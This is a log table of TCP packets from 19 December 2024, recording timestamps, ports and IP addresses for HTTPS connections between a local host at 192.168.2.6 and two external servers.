
TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 07:57:53.256944895 CET	49709	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:53.256993055 CET	443	49709	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:53.257168055 CET	49709	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:53.257220984 CET	49709	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:53.257325888 CET	443	49709	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:53.257450104 CET	49709	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:53.289570093 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:53.289624929 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:53.289782047 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:53.294461012 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:53.294481993 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:54.994209051 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:54.994455099 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:54.995271921 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:54.995359898 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:55.000202894 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:55.000212908 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:55.000436068 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:55.048629045 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:55.086813927 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:55.127327919 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:55.893996954 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:55.896081924 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:55.896876097 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:55.959990978 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:55.959990978 CET	49710	443	192.168.2.6	172.217.17.46
Dec 19, 2024 07:57:55.960020065 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:55.960031986 CET	443	49710	172.217.17.46	192.168.2.6
Dec 19, 2024 07:57:56.110933065 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:57:56.110951900 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:57:56.111043930 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:57:56.111375093 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:57:56.111383915 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:57:57.808137894 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:57:57.808245897 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:57:57.809983015 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:57:57.809993029 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:57:57.810297966 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:57:57.812427044 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:57:57.855360985 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.025772095 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.025913954 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.038964033 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.039084911 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.063004971 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.063112020 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.145087957 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.196548939 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.196569920 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.221569061 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.221654892 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.221673965 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.231309891 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.231400967 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.231416941 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.240763903 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.240820885 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.240842104 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.251086950 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.251152039 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.251173019 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.264830112 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.264877081 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.264908075 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.277611971 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.277673006 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.277698994 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.291691065 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.291749954 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.291768074 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.305089951 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.305144072 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.305151939 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.324044943 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.324347019 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.324362040 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.332250118 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.332330942 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.332344055 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.345926046 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.346000910 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.346015930 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.356493950 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.356601000 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.356618881 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.378472090 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.378571033 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.378592014 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.409810066 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.409863949 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.409893036 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.417320967 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.417404890 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.417429924 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.419270039 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.419327021 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.419339895 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.430830002 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.430903912 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.430929899 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.441601038 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.441684008 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.441708088 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.452512980 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.452589035 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.452590942 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.452619076 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.452663898 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.462523937 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.472932100 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.473018885 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.473057985 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.482821941 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.482903957 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.482937098 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.492824078 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.492902040 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.492938042 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.502839088 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.502912045 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.502943993 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.513050079 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.513132095 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.513164043 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.522730112 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.522783995 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.522821903 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.532907009 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.532984018 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.532988071 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.533015966 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.533057928 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.541719913 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.550430059 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.550549984 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.550558090 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.550597906 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.550647020 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.551882029 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.559129953 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.559205055 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.559232950 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.567725897 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.567828894 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.567858934 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.578345060 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.578430891 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.578459978 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.583877087 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.583960056 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.583986044 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.592750072 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.592823029 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.592849016 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.597317934 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.597383976 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.597409964 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.604137897 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.604207039 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.604235888 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.609513044 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.609596968 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.609625101 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.614404917 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.614579916 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.614607096 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.619645119 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.619765043 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.619788885 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.624947071 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.625005960 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.625025988 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.630218029 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.630254984 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.630280972 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.630306959 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.630348921 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.635016918 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.640160084 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.640230894 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.640235901 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.640264034 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.640306950 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.645822048 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.650253057 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.650321007 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.650346994 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.655174971 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.655236006 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.655261040 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.660249949 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.660281897 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.660375118 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.660397053 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.660444021 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.665077925 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.669889927 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.669958115 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.669986010 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.674851894 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.674926996 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.674931049 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.674957991 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.675000906 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.679698944 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.684798002 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.684868097 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.684894085 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.689326048 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.689398050 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.689424038 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.694948912 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.695014000 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.695015907 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.695044041 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.695089102 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.698564053 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.704894066 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.704962015 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.704988956 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.708146095 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.708219051 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.708235025 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.714744091 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.714819908 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.714838982 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.717058897 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.717114925 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.717123985 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.726453066 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.726494074 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.726577997 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.726598978 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.726675987 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.727054119 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.733742952 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.733831882 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.733840942 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.733853102 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.733930111 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.734846115 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.742511034 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.742548943 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.742614985 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.742641926 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.742717028 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.743561983 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.743662119 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.743704081 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.743717909 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.750926018 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.750984907 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.751008034 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.752221107 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.752274036 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.752290010 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.760025978 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.760077953 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.760098934 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.761048079 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.761090040 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.761106014 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.767689943 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.767741919 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.767762899 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.768708944 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.768753052 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.768764973 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.775691986 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.775747061 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.775768042 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.776750088 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.776793003 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.776806116 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.782526016 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.782577038 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.782597065 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.783982992 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.784029007 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.784044981 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.789108038 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.789153099 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.789172888 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.791455030 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.791557074 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.791574001 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.795855045 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.795909882 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.795931101 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.798824072 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.798882008 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.798898935 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.802072048 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.802124977 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.802143097 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.805489063 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.805562019 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.805581093 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.808917046 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.808971882 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.808990955 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.812072039 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.812133074 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.812150955 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.815721035 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.815784931 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.815803051 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.818691969 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.818773985 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.818800926 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.821787119 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.821844101 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.821862936 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.826324940 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.826380968 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.826400042 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.830018997 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.830082893 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.830101013 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.831504107 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.831578016 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.831593037 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.833910942 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.833965063 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.833981037 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.837397099 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.837454081 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.837471962 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.842489958 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.842557907 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.842581034 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.847376108 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.847445965 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.847470999 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.847985029 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.848042965 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.848052979 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.857352972 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.857433081 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.857464075 CET	443	49712	172.217.17.65	192.168.2.6
